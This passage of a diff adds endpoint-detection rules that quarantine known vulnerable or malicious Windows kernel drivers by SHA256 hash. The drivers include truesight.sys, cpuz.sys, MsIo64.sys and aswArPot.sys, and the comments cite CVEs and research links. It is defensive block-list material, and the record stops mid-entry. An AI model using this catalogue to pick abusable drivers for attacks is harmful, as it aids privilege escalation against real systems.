"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812169Z", + "creation_date": "2026-03-23T11:45:31.812171Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812177Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d7fd0abc3f05184243363889c705786f10fe0bd85023f4cad4a0749ff7c431cf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c1e32740-d924-5edc-b527-eb9def0ebe2b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807446Z", + "creation_date": "2026-03-23T11:45:31.807448Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807454Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "20c3b13fd0da01f901fce7daf1eb7531fefb37be6f7a690efc1a22f4889f0199", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c1ec604b-b474-5807-94a7-a57c6fa72233", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976428Z", + "creation_date": 
"2026-03-23T11:45:29.976430Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976436Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c1f07d58-e4f0-5f36-95f9-5705ba0c0479", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456248Z", + "creation_date": "2026-03-23T11:45:30.456252Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456260Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "698353791261d5a9ca3245ae8f86334493df554690ec7962895c2affe4050db2", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c1fa2df2-2ca1-5590-9f0a-6f86235409a5", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480527Z", + "creation_date": "2026-03-23T11:45:31.480531Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480540Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "512110fbb8ddf0c909e5676a94eaf0ad7a0847cc2a70692e8ed96ba82462cfbe", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c1fea586-d297-5e6b-aac3-18082bc390e5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.478773Z", + "creation_date": "2026-03-23T11:45:31.478777Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.478785Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1d269d6f031743967b7affefe29f0fb0d2315047676464aa23052da44410b1b1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c209ab55-935e-5ff3-835d-46526c46e8fd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474388Z", + "creation_date": "2026-03-23T11:45:30.474391Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.474399Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "43eeac44acc2f0aefc02522f1d203b37798fec9232d5b6c5d266badc118a1d8b", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c20bbad5-dc53-56b2-982b-4c73c206bf10", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614110Z", + "creation_date": "2026-03-23T11:45:29.614112Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614118Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0f035948848432bc243704041739e49b528f35c82a5be922d9e3b8a4c44398ff", + "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c20cda53-0c27-5077-bc27-febff0fc74ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980029Z", + "creation_date": "2026-03-23T11:45:29.980031Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980036Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4", + "comment": 
"Malicious Kernel Driver (aka wantd.sys) [https://www.loldrivers.io/drivers/892292f9-b87c-40a5-80e5-8c9b02914e8b/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c215410f-0738-59c5-97cf-7472b4576aa7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144141Z", + "creation_date": "2026-03-23T11:45:31.144143Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144148Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fb270140b9a9df701906b79419807945bd39aa552524a67a62e89110ce7d2dc6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c215b303-b470-5821-98a2-4b1805df15f4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.146988Z", + "creation_date": "2026-03-23T11:45:31.146990Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146996Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fc8b53ebef91d234235dca92d368727db634afd4a4cf0f4cecb6eb1fc29260e9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c21907d9-b23d-5529-affd-85088fb3e7cf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474854Z", + "creation_date": "2026-03-23T11:45:30.474857Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.474866Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fed2e6e84e5f7212a86ede773184d97fb11d24b5da26a030c833dd1bec4ec953", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"c21b1101-98d1-5890-971e-21aef12051ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147094Z", + "creation_date": "2026-03-23T11:45:31.147096Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147102Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5c5718f3ef2a578761ac96209df9ba0d1c5636ea16530a88f2d2bd70e127f22e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c21be22e-404f-5306-926c-d34282d34b81", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813115Z", + "creation_date": "2026-03-23T11:45:31.813118Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.813127Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7c358142fe85e9e20006a5b85b5ce5f4b09ee6d726be739654ccfe393a6f7756", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c21ccb4a-ec32-5d38-9c87-89109f08d8c9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827236Z", + "creation_date": "2026-03-23T11:45:30.827238Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827244Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "87cf6d683238be3246dac8aae352d0ca5197eba5493a98357f32efd954cdd20e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c22b46e8-3414-5573-8256-da6bc14de01d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981839Z", + "creation_date": "2026-03-23T11:45:29.981841Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981846Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0de4247e72d378713bcf22d5c5d3874d079203bb4364e25f67a90d5570bdcce8", + "comment": "Vulnerable Kernel Driver (aka TestBone.sys) [https://www.loldrivers.io/drivers/be4843ef-a2a8-4a0d-91c6-42e165800bb0/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c2367434-8e90-5aae-8bec-da2d78f0a4f5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500309Z", + "creation_date": "2026-03-23T11:45:31.500312Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500320Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", 
+ "value": "7041b742a7332c981f9ad28f3e9c11ef4667ab64242c5e8f3af589ed454c6587", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c239d57c-1c0d-5638-bc7f-7bd9ad989ced", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612457Z", + "creation_date": "2026-03-23T11:45:29.612459Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612464Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e777b95e5432b2a7f43d515c7e7a34d34abc530881c833765f634b2449a8910d", + "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c23bbf4a-80ae-5e1f-9a38-af08d5e865f7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { 
+ "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830095Z", + "creation_date": "2026-03-23T11:45:30.830097Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830103Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b56b6cadbf270f86a937878e3383485bd473b81b5afca5561308fa34c6000ebc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c23bc317-3d1f-57fc-98e6-2dc419c756af", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831091Z", + "creation_date": "2026-03-23T11:45:30.831093Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831099Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7888b85212909ca68906d64a1f0c3ec48edb86e3b24f0f1545f6980f1c37cbca", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka 
truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c23f60cd-2c04-55dd-9bbc-e5a2547d4806", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616587Z", + "creation_date": "2026-03-23T11:45:29.616589Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616594Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5f487829527802983d5c120e3b99f3cf89333ca14f5e49ac32df0798cfb1f7aa", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c25927f1-2fc3-5b3b-b056-a27c01d21fb0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968758Z", + "creation_date": 
"2026-03-23T11:45:29.968760Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968766Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e8efe2cc534bf32fd7d5413005388125a2f449049c95437eae7c98584c403f67", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c266398c-aa31-51be-a0b2-ea7a10700c7a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830789Z", + "creation_date": "2026-03-23T11:45:30.830791Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830796Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b14d3075284ca8e7eba4a2b4dfe6ca26b5e31f753ac33b4934baaaece9b08cf4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"c26f404f-841c-5484-874c-c6c5de02b153", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972789Z", + "creation_date": "2026-03-23T11:45:29.972791Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972797Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "401ed2d2768707b5c47556774c119f989986a9e2fa88e1e2626f14e22b85e66b", + "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c2742a95-ac6b-59a0-8f5f-fe5585efde08", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453192Z", + "creation_date": "2026-03-23T11:45:30.453196Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
